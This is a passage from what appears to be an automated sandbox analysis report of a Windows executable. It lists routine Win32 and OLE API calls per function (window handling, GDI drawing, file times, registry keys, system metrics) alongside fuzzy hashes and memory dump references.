                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                      • String ID:
                                      • API String ID: 168474834-0
                                      • Opcode ID: c20253ac335b2a8ee8ba3202936b2cdb8691aa8ab60debc34aa857a75018fe98
                                      • Instruction ID: 5148e936cb951f8206727751412b064e1f1b6a39b4c9be85cff580e0d8a97c89
                                      • Opcode Fuzzy Hash: c20253ac335b2a8ee8ba3202936b2cdb8691aa8ab60debc34aa857a75018fe98
                                      • Instruction Fuzzy Hash: BE11A371600604BAEB215BB6CC49EAFBABDEF85744F10042EF614D1122DA39DD109768
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042F9BE, Relevance: 10.8, APIs: 7, Instructions: 297memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0042F790: CoGetClassObject.OLE32(00000000,?,00000000,00461810,00000003,?,?,?,?,0042F9EC,?,00000000,00000003,00461870,?,?), ref: 0042F7B0
                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 0042FB49
                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 0042FB6A
                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 0042FBB2
                                      • GlobalLock.KERNEL32 ref: 0042FBC0
                                      • GlobalUnlock.KERNEL32(?), ref: 0042FBD8
                                      • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 0042FBFB
                                      • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,00000000), ref: 0042FC17
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: GlobalLock$Bytes$Create$AllocClassDocfileObjectOpenStorageUnlock
                                      • String ID:
                                      • API String ID: 3681960158-0
                                      • Opcode ID: 5f726ab22834d1a6264330f1efcc51d5a1e687ade51fe599eb17d476a46907e1
                                      • Instruction ID: d4396a8c99a0fe78b8004d18f2fffcf119ff0ca799d38c6c0adf92e2c278bb8c
                                      • Opcode Fuzzy Hash: 5f726ab22834d1a6264330f1efcc51d5a1e687ade51fe599eb17d476a46907e1
                                      • Instruction Fuzzy Hash: 4AB147B0A0021AAFCB10DFA5D888AAE7BB9FF48304B90447EF815DB251D735ED45CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043E1AE, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 241fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000001,80000000,00000040,0000000C,00000001,00000080,00000000,004297D1,00000000,00000000), ref: 0043E361
                                      • GetLastError.KERNEL32 ref: 0043E36D
                                      • GetFileType.KERNEL32(00000000), ref: 0043E382
                                      • CloseHandle.KERNEL32(00000000), ref: 0043E38D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: File$CloseCreateErrorHandleLastType
                                      • String ID: @$H
                                      • API String ID: 1809617866-104103126
                                      • Opcode ID: 91df179f34d13add390b8ef2cf3ec7d7aeb2ff0473b7e67c6d4711c8b689c95c
                                      • Instruction ID: ced1e1128a34a63a781f2a98c70176bc360a36397ac4a1add17a99f7dca4134d
                                      • Opcode Fuzzy Hash: 91df179f34d13add390b8ef2cf3ec7d7aeb2ff0473b7e67c6d4711c8b689c95c
                                      • Instruction Fuzzy Hash: 30815F718062489AEF304BAACC447AF7B645F0D324F1462ABE9616B3D1C37C8D45C75E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00443301, Relevance: 10.6, APIs: 7, Instructions: 140COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPropA.USER32 ref: 00443353
                                      • CallWindowProcA.USER32 ref: 00443375
                                        • Part of subcall function 004401E0: CallWindowProcA.USER32 ref: 00440206
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044021E
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044022A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Prop$CallProcRemoveWindow
                                      • String ID:
                                      • API String ID: 2276450057-0
                                      • Opcode ID: 1e173f0c99c176eca99fd3243e9242e524e02e853743610a4bb49cb8a90d98b1
                                      • Instruction ID: 8a3463856bcdaaf901367c5ed8cb4a810c22bae2993c5058439ef0589cee3e0e
                                      • Opcode Fuzzy Hash: 1e173f0c99c176eca99fd3243e9242e524e02e853743610a4bb49cb8a90d98b1
                                      • Instruction Fuzzy Hash: D031F6776002106BE3019BA5AC45EDFB75CDF96766F04042AFE0583212D77D9E0A86BB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00446993, Relevance: 10.6, APIs: 7, Instructions: 122windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(BAADBEEF), ref: 004469C7
                                      • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004469F0
                                      • UpdateWindow.USER32(BAADBEEF), ref: 00446A0C
                                      • SendMessageA.USER32(?,00000121,00000000,BAADBEEF), ref: 00446A32
                                      • SendMessageA.USER32(BAADBEEF,0000036A,00000000,00000001), ref: 00446A51
                                      • UpdateWindow.USER32(BAADBEEF), ref: 00446A94
                                      • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00446AC7
                                        • Part of subcall function 00446FC7: GetWindowLongA.USER32 ref: 00446FD3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Message$Window$PeekSendUpdate$LongParent
                                      • String ID:
                                      • API String ID: 2853195852-0
                                      • Opcode ID: 4e515cc6230758478cb585541763a43c0a015da5c5ec2cb6ac52ca1b91a39fd6
                                      • Instruction ID: 1ecfded72279192a77f76016244e86c57b20ae6bdd27353a19bf90bdc93037e9
                                      • Opcode Fuzzy Hash: 4e515cc6230758478cb585541763a43c0a015da5c5ec2cb6ac52ca1b91a39fd6
                                      • Instruction Fuzzy Hash: 97416070604B419BE720DF268848B1BBAE4EFC3B05F11491EF481A6292DB79D949CB5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004402C0, Relevance: 10.6, APIs: 7, Instructions: 109COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetBkColor.GDI32(?), ref: 004402DD
                                      • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0044032A
                                      • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00440359
                                      • SetBkColor.GDI32(?,?), ref: 00440377
                                      • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004403A2
                                      • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004403DC
                                      • SetBkColor.GDI32(?,00000000), ref: 004403E4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Text$Color
                                      • String ID:
                                      • API String ID: 3751486306-0
                                      • Opcode ID: 8c0f715314ad55a4180ed3757eff0ae21b8fa8f44b9268149df38decf519f5da
                                      • Instruction ID: 19982ab57f64ae02449c1912e004b90eaa0c0571b9cf996a250abe5e9647ecbb
                                      • Opcode Fuzzy Hash: 8c0f715314ad55a4180ed3757eff0ae21b8fa8f44b9268149df38decf519f5da
                                      • Instruction Fuzzy Hash: C1417C70644341AFE320DF14CC86F2ABBE4EB84B40F14481AFA54AB2D1D774E949CB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00443769, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,00000000,?,?,?,?,00443759,00000000,?,?,?,0042B038,?,?), ref: 004437E6
                                      • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,?,?,?,?,00443759,00000000,?,?,?,0042B038,?,?), ref: 004437F8
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,00000000,?,?,?,?,00443759,00000000,?,?,?,0042B038,?,?), ref: 00443854
                                      • LocalFileTimeToFileTime.KERNEL32(?,Y7D,?,00000000,?,?,?,?,00443759,00000000,?,?,?,0042B038,?,?), ref: 00443862
                                      • SetFileTime.KERNEL32(00000000,00000000,Y7D,?,?,00000000,?,?,?,?,00443759,00000000,?,?,?,0042B038), ref: 00443880
                                        • Part of subcall function 0043601C: GetLocalTime.KERNEL32(00443781), ref: 00436029
                                        • Part of subcall function 0043601C: GetSystemTime.KERNEL32(?), ref: 00436033
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Time$File$LocalSystem
                                      • String ID: Y7D
                                      • API String ID: 1748579591-2107304336
                                      • Opcode ID: d68d2b2750b4757c60f3088f70ccb153723fc57832af42855b909bfd152af04e
                                      • Instruction ID: f1a9f31b0cf89d75d10eec25a45aebff7532f903cb9d69f13ca31f84571005b9
                                      • Opcode Fuzzy Hash: d68d2b2750b4757c60f3088f70ccb153723fc57832af42855b909bfd152af04e
                                      • Instruction Fuzzy Hash: 40415A7591420AA9DB04EFA1D9449EFB7B8FF0CB50F04446AE905E7261EB34EA40C7AC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00433FD0, Relevance: 10.6, APIs: 7, Instructions: 87windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindow.USER32(?,00000002), ref: 00433FEB
                                      • GetParent.USER32(?), ref: 00433FFE
                                        • Part of subcall function 00433F77: GetWindowLongA.USER32 ref: 00433F8F
                                        • Part of subcall function 00433F77: GetParent.USER32(?), ref: 00433FA8
                                        • Part of subcall function 00433F77: GetWindowLongA.USER32 ref: 00433FBB
                                      • GetWindow.USER32(?,00000002), ref: 00434021
                                      • GetWindow.USER32(?,00000002), ref: 00434033
                                      • GetWindowLongA.USER32 ref: 00434043
                                      • IsWindowVisible.USER32 ref: 0043405C
                                      • GetTopWindow.USER32(?), ref: 00434082
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$Long$Parent$Visible
                                      • String ID:
                                      • API String ID: 3473418232-0
                                      • Opcode ID: 6f142e77e8819952e582ba6504c101a87505c71958737715f483414e5016ec74
                                      • Instruction ID: e84c8d87cbdf7277eeb70011959a2305ceda8e4a8008be40c84ddd73d9869745
                                      • Opcode Fuzzy Hash: 6f142e77e8819952e582ba6504c101a87505c71958737715f483414e5016ec74
                                      • Instruction Fuzzy Hash: 6B21D871B047105BD731AE758C4AF6B76BC9F88355F04151AFE4197261C72CEC0187A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044B782, Relevance: 10.6, APIs: 7, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCapture.USER32 ref: 0044B78B
                                      • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0044B7A8
                                      • GetFocus.USER32 ref: 0044B7BA
                                      • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0044B7CA
                                      • GetLastActivePopup.USER32(?), ref: 0044B7ED
                                      • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 0044B7FD
                                      • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0044B81C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                      • String ID:
                                      • API String ID: 3219385341-0
                                      • Opcode ID: e9f2a069dcd0d9f13dca5ef331a989d814510418098e1a61c74f5a1467328574
                                      • Instruction ID: a6a4467881f0a563eb9e527b8e8497dbea7740f76221082eaf257de480d9ca1d
                                      • Opcode Fuzzy Hash: e9f2a069dcd0d9f13dca5ef331a989d814510418098e1a61c74f5a1467328574
                                      • Instruction Fuzzy Hash: 0911A0762002096BF6106A259C84C3F7A6EDFC2B9AB12483BF40193212DF29DC0246BA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00441C80, Relevance: 10.6, APIs: 7, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32 ref: 00441C90
                                      • GetWindowLongA.USER32 ref: 00441C99
                                      • InflateRect.USER32(?,00000001,00000001), ref: 00441CF8
                                      • GetParent.USER32(?), ref: 00441CFF
                                      • ScreenToClient.USER32 ref: 00441D13
                                      • ScreenToClient.USER32 ref: 00441D1B
                                      • InvalidateRect.USER32(00000000,?,00000000), ref: 00441D31
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
                                      • String ID:
                                      • API String ID: 1809568455-0
                                      • Opcode ID: a68aadb0ce294940913ab76aa593c5946ba7fe4d46ab83dad1e2f242f93b76a8
                                      • Instruction ID: 36ed5c128126340ce13984ecb1c040ca4e452e9c7b4dbc6e076c0ec9d42f7a7f
                                      • Opcode Fuzzy Hash: a68aadb0ce294940913ab76aa593c5946ba7fe4d46ab83dad1e2f242f93b76a8
                                      • Instruction Fuzzy Hash: 1E217971500305AFE304DAA4CCD4FBB73A9EB81721F00091AF552832A2E738E885C766
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044D5EA, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 0044D618
                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 0044D63B
                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 0044D65A
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0044D66A
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0044D674
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CloseCreate$Open
                                      • String ID: software
                                      • API String ID: 1740278721-2010147023
                                      • Opcode ID: de8aa21f3dd514d86e7ceebf770ff6636a4f535fdee3be26648c8111f4ee1fa5
                                      • Instruction ID: 66751f2a136e7859cc7455a2f5af4a9345b45f7e433387b4562e6f341a459d32
                                      • Opcode Fuzzy Hash: de8aa21f3dd514d86e7ceebf770ff6636a4f535fdee3be26648c8111f4ee1fa5
                                      • Instruction Fuzzy Hash: 88110A72D00158FBDB21DB96DC84EEFFFBCEF85745F1140AAA504A2121D3719A40DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042D471, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 0042D4AF
                                      • GetSystemMetrics.USER32 ref: 0042D4C7
                                      • GetSystemMetrics.USER32 ref: 0042D4CE
                                      • lstrcpyA.KERNEL32(-00000028,DISPLAY,00000028), ref: 0042D4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: System$Metrics$InfoParameterslstrcpy
                                      • String ID: B$DISPLAY
                                      • API String ID: 1409579217-3316187204
                                      • Opcode ID: 5b5ebc0d2117855cf25b737ad31cd0bab4692504fede2862c4ef29b995288be7
                                      • Instruction ID: d618f482830a2f1a2c3b7b84c755b3a5851c22dde2dc88aec1e64f3a59e4589d
                                      • Opcode Fuzzy Hash: 5b5ebc0d2117855cf25b737ad31cd0bab4692504fede2862c4ef29b995288be7
                                      • Instruction Fuzzy Hash: D011A771A00334AFCF15AF54AC8469BBFA8EF05751B508067FC059E162D2B5F940CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00441D40, Relevance: 10.5, APIs: 7, Instructions: 42COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Rect$ClientScreenWindow$InflateLongParentValidate
                                      • String ID:
                                      • API String ID: 2275295265-0
                                      • Opcode ID: 43722693757f858420004bc60e6d24c86fbcfc877668dec827c3890ec8d337a5
                                      • Instruction ID: 3fd99f691f5ebd1b3105e2288219bf726ccbb7b6cefd4d60ca6e9103f36971b3
                                      • Opcode Fuzzy Hash: 43722693757f858420004bc60e6d24c86fbcfc877668dec827c3890ec8d337a5
                                      • Instruction Fuzzy Hash: 05F08C76100302BFE3119B94DCC8EBF37BCEB89722F004529F915921A2D734E8068B76
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00449040, Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(0000000F), ref: 0044904C
                                      • GetSysColor.USER32(00000010), ref: 00449053
                                      • GetSysColor.USER32(00000014), ref: 0044905A
                                      • GetSysColor.USER32(00000012), ref: 00449061
                                      • GetSysColor.USER32(00000006), ref: 00449068
                                      • GetSysColorBrush.USER32(0000000F), ref: 00449075
                                      • GetSysColorBrush.USER32(00000006), ref: 0044907C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Color$Brush
                                      • String ID:
                                      • API String ID: 2798902688-0
                                      • Opcode ID: 60c10ff6a55392d29506e87486369c4c1ba64106531382c9855b071ae32116ff
                                      • Instruction ID: a9a3f7d6c0da977067b7d7f9e5e0febf63504ec1939addfc6cd9e98c9eff6c03
                                      • Opcode Fuzzy Hash: 60c10ff6a55392d29506e87486369c4c1ba64106531382c9855b071ae32116ff
                                      • Instruction Fuzzy Hash: 36F012719407445BE730BF729D09B47BAE0FFC4B10F02092ED1458BAA0E6B5E401DF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044BE73, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25registryclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Version$ClipboardFormatRegister
                                      • String ID: MSWHEEL_ROLLMSG
                                      • API String ID: 2888461884-2485103130
